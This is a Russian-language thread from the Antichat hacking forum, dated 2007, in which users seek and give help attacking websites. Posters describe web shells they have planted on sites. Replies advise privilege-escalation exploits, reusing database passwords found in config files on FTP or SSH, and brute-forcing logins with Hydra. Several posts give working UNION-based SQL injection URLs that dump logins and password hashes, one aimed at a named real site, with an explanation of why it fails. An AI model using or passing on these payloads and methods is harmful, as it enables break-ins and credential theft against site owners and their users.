Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
27.12.2007, 19:21
|
|
Познающий
Регистрация: 17.06.2007
Сообщений: 39
Провел на форуме:
197892
Репутация:
11
|
|
У меня такой вопрос: я залил на сайт шелл(C99madShell v. 2.0 madnet edition), могу только скачиват файлы. Закачивать могу только в одну папку "images". В другие папки не закачивает. Не могу изменить chmod. Насколько я понимаю у меня нет прав ы на запись или есть еще какая-то проблема??? Если у меня нет прав на запись, то как можно их получить???
|
|
|
27.12.2007, 20:07
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Ищи сплоенты под товою ось для локального поднятия прав как вариант 
__________________
Кто я?..
|
|
|
|
27.12.2007, 20:13
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
точно не скажу, но помоему в маднетовском шелле бага такая, что файлы он заливает в туже папку где и шелл, а права для записи скорее всего есть у фтп-пользователя ищи конфиги для работы с БД, находи в них пароли от БД и пробуй эти пароли на фтп или ssh
__________________
Карфаген должен быть разрушен...
|
|
|
|
28.12.2007, 22:06
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
В форуме ipb версии 1.3 finall залил через "Загрузка нового стиля" шелл.
Теперь не могу его найти. Система говорит, что он есть, а по адресу sait.ru/Skin/shell.php его нет.
Куда могла его импотировать система?
|
|
|
|
29.12.2007, 16:29
|
|
Новичок
Регистрация: 10.12.2007
Сообщений: 11
Провел на форуме:
212520
Репутация:
1
|
|
Такой вопрос
index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*
Таким запросом я могу просматривать хэши, меняя только значения limit,
а каким запросом можно перемаслать Юзверей?
|
|
|
|
29.12.2007, 16:35
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от Op3r
Такой вопрос
index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*
Таким запросом я могу просматривать хэши, меняя только значения limit,
а каким запросом можно перемаслать Юзверей?
Ты имеешь ввиду логины ?
ну например так
index.php?kat=2&kp=-39+union+select+ concat_ws(0x2F,login,pass)+from+user+limit+0,1/*
вывод будет логин/хеш
или так
index.php?kat=2&kp=-39+union+select+ concat(login,0x2F,pass)+from+user+limit+0,1/*
вывод будет такой же
|
|
|
|
29.12.2007, 19:00
|
|
Новичок
Регистрация: 23.01.2007
Сообщений: 21
Провел на форуме:
20113
Репутация:
1
|
|
вот все пишут, когда получил файл etc/passwd пробрути по логин:логин
А что пробрутить-то надо и чем?
Ещё вопрос, очень гглупый. для чего в БД используется limit и как он помогает в иньекциях?
|
|
|
|
29.12.2007, 22:29
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
У меня какая-то херня получается с 1 сайтом:
Код HTML:
http://www.verticalworld.net/school/program.php?id=6'
Если сделать так:
Код HTML:
http://www.verticalworld.net/school/program.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*
Не получается, а если так:
Код HTML:
http://www.verticalworld.net/school/program.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
Получается еще неправильней. Что делать?  |
|
|
|
29.12.2007, 22:35
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
вот все пишут, когда получил файл etc/passwd пробрути по логин:логин
А что пробрутить-то надо и чем?
Ещё вопрос, очень гглупый. для чего в БД используется limit и как он помогает в иньекциях?
Бруть с помощью Hydra фтп, е-маилы и т.д. вижео по использованию выложено здесь, поюзай поиск.
|
|
|
|
29.12.2007, 22:55
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
2~EviL~
есть 2 запроса, в которых используется id (на самом деле их 3 как минимум там еще UPDATE есть)
1.SELECT * FROM school_programs WHERE id =$id он получает все колонки из таблицы school_programs, их 37 и когда ты подставляешь union select с 37 колонками запрос получается правильный:
Код:
SELECT * FROM school_programs WHERE id =1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*
но потом $id (и твой запрос соответственно) передается во второй запрос:
2.SELECT AVG(score) AS number FROM school_rating WHERE program_id =$id он получает одно число (среднее из колонки score) подставляем значение $id получаем
Код:
SELECT AVG(score) AS number FROM school_rating WHERE program_id = 1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*
неправильный запрос, для правильного запроса надо было бы указать:
$id=1 union select 1/* но это вызвало бы ошибку в первом запросе, так что тут остается только использовать подзапросы по другому никак
__________________
Карфаген должен быть разрушен...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
